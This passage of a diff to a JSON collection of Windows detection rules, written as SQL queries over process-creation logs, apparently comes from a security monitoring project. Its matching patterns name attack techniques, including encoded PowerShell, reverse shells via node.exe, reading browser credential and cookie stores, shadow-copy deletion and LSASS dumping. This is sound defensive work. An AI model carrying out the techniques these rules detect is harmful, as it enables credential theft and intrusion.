"attack.defense_evasion", + "attack.lateral_movement" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", + "title": "Arbitrary Command Execution Using WSL", + "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1055.001" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Automation and orchestration scripts may use this method to execute scripts etc.", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
((NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\' OR CommandLine LIKE '%--debug-shell%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_wsl_lolbin_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", - "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "status": "experimental", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], 
- "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets", - "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", - "status": "test", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", - "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "title": "PDQ Deploy Remote Adminstartion Tool Execution", + "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of PDQ Deploy remote admin tool", + "author": "frack113", "tags": [ - "attack.defense_evasion", - 
"attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_pdqdeploy_execution.yml" }, { - "title": "PUA - NirCmd Execution", - "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", "status": "experimental", - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", 
"tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", 
@@ -16838,596 +16747,580 @@ "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "title": "Curl.EXE Execution With Custom UserAgent", + "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "description": "Detects execution of curl.exe with custom useragent options", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_curl_useragent.yml" }, { - "title": "Suspicious Msbuild Execution By Uncommon Parent Process", - "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", - "status": "experimental", - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "author": "frack113", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document 
droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nuget.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msbuild_susp_parent_process.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Remote Access Tool - AnyDesk Execution", - "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when 
compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Process Memory Dump Via Dotnet-Dump", + "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "status": "experimental", + "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_anydesk.yml" + "filename": "proc_creation_win_lolbin_dotnet_dump.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of Mftrace.exe", + "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "status": "experimental", + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Legitimate use for tracing purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_lolbin_mftrace.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "author": "Florian Roth (Nextron Systems)", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "status": "experimental", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + 
"title": "Add New Windows Capability - ProcCreation", + "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN 
('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_powershell_add_windows_capability.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "Use of FSharp Interpreters", + "id": "b96b2031-7c17-4473-afe7-a30ce714db29", + "status": "experimental", + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" + "attack.t1059" ], "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "Legitimate use by a software developer." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR NewProcessName LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - 